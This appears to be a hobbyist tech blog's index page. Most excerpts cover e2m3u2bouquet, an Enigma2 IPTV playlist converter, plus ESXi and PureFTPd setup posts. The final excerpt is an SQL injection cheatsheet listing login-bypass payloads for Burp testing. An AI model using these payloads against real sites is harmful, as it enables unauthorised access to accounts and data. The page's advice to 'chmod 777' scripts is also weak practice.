E2m3u2bouquet Help Thread

Help Thread Common problems and resolutions for E2m3u2bouquet. “Permission denied” attempting to run the script Ensure the script is executable, eg run (in the folder the script is in) chmod 777 e2m3u2bouquet.py then run the script as per instructions or run the script via python python e2m3u2bouquet.py -n PROVIDER -u USERNAME -p PASSWORD EPG is not working Ensure you have enabled the source in epg-importer and run a manual import. If this still doesn’t work paste your epg url into firefox, this should return a bunch of XML data to the browser (nb: doesn’t work in chrome), if you don’t receive... Read more

e2m3u2bouquet 0.4.2

V0.4.2 Quick post, purely a bug fix release, Includes 0.4.1 fix invalid picon path hanging the script includes 0.4.1 update service number to use numbers unlikely to be in use by existing sat services includes 0.4.1 leave service number gaps between categories to reduce the effect of playlist additions cause the epg to get out of sync Fixed error for ACE and FLAWLESS users where “:” in category put the box into an infinite loop e2m3u2bouquet_v0.4.2  

e2m3u2bouquet 0.4

V0.4 OK been a couple of weeks but we have been busy. Latest version of the script is now available below or from the home page, goto the home page for install instructions etc. The script has come on a bit and is starting to be a bit more mature, some 500 lines of code compared to the initial release at 100 lines. We are also now a team of 2! so kudos to Doug Mackay for doing at least half the coding on this release, also to Jose Sanchez for supplying the code for the picon support. So changes... Read more

e2m3u2bouquet – Automation via cron job

Cron Automation OK quick post for those who requested it. ssh to your enigma2 box install busybox-cron opkg install busybox-cron Now set up your job crontab -e Will open the cron text editor. Next steps need to be followed exactly as vi isn’t the most user friendly text editor Press insert to start inputting text Input your schedule and the command to run eg: 0 6,18 * * * /etc/enigma2/e2m3u2bouquet/e2m3u2bouquet.py >> /tmp/e2.log or 0 6,18 * * * /etc/enigma2/e2m3u2bouquet/e2m3u2bouquet.py -m "http://stream.fabiptv.com:25461/get.php?username=YOURUSERNAME&password=YOURPASSWORD&type=m3u_plus&output=ts" -e "http://stream.fabiptv.com:25461/xmltv.php?username=YOURUSERNAME&password=YOURPASSWORD" press escape to exit text entering mode input :wq to write and quit from the file, your... Read more

Enigma2 IPTV m3u to bouquet v0.3

V0.3 nb: e2m3u2bouquet homepage is here for full instructions. OK quick post to put this out there, Thanks to all who tested the initial version and for all the suggestions and feedback really useful. New version is a complete rewrite of the code base that won’t interest anyone unless they have an interest in python…. Feature wise it does the following tvg-id now included in the channels from the m3u file better parsing of m3u data (credit: Doug MacKay) downloads m3u file from url sets custom source to providers xml tv feed (as per Dougs v0.2) fixed IPTV streams not... Read more

Enigma2 IPTV m3u to bouquet

E2m3u2bouquet This post is obsolete : Please see e2m3u2bouquet homepage for latest version Background Bit of a side project this one, but following recent developments seemed a shame not to be getting the best out of the VU+ solo2 box. Long story short there are some good IPTV providers out there, however the offering enigma2 wise seems to be a giant m3u file that you import into a single bouquet or manually configure with E-channeliser. Both reasonable approaches but a bit lacking in usability and some what time consuming. Anyway a couple of nights research and a bit of messing about and... Read more

ESXi 6.5 on HP Microserver Gen 8

Well having decided to put together a small homelab and purchased a HP Microserver Gen 8 for the purpose I decided to go a head with VMware ESXi for the hypervisor, some thing new and we all like a challenge right? Well its defintely been a challange in retrospec Hyper-V might have been easier but anyway I’ll get the process down well its still fresh in my mind. Setup is currently the bog standard microserver, so 4gb Ram, celeron 2.3, 32GB USB stick and 2 X 2TB SATA drives… memory and processor upgrades yet to come. Downloaded the HP specific... Read more

Kali Linux install PureFTPD

A very quick and dirty guide to installing Pure FTPd on kali linux Install apt-get install pure-ftp Create a basic setup script nano ftp-setup.sh #!/bin/bash groupadd ftpgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pw useradd ftpuser -u ftpuser -d /ftphome pure-pw mkdb cd /etc/pure-ftpd/auth/ ln -s ../conf/PureDB 60pdb mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/ /etc/init.d/pure-ftpd restart Make script executable and execute chmod 777 ftp-setup.sh ./ftp-setup.sh

SQLi Cheatsheet

SQLi Quick list of useful SQLi payloads, unsure of the original author to credit but is knocking about various areas of the web, useful reference to load into burp ' or 1=1 or 1=1-- or 1=1# or 1=1* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'* admin' or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'* 1234' AND 1=0 UNION... Read more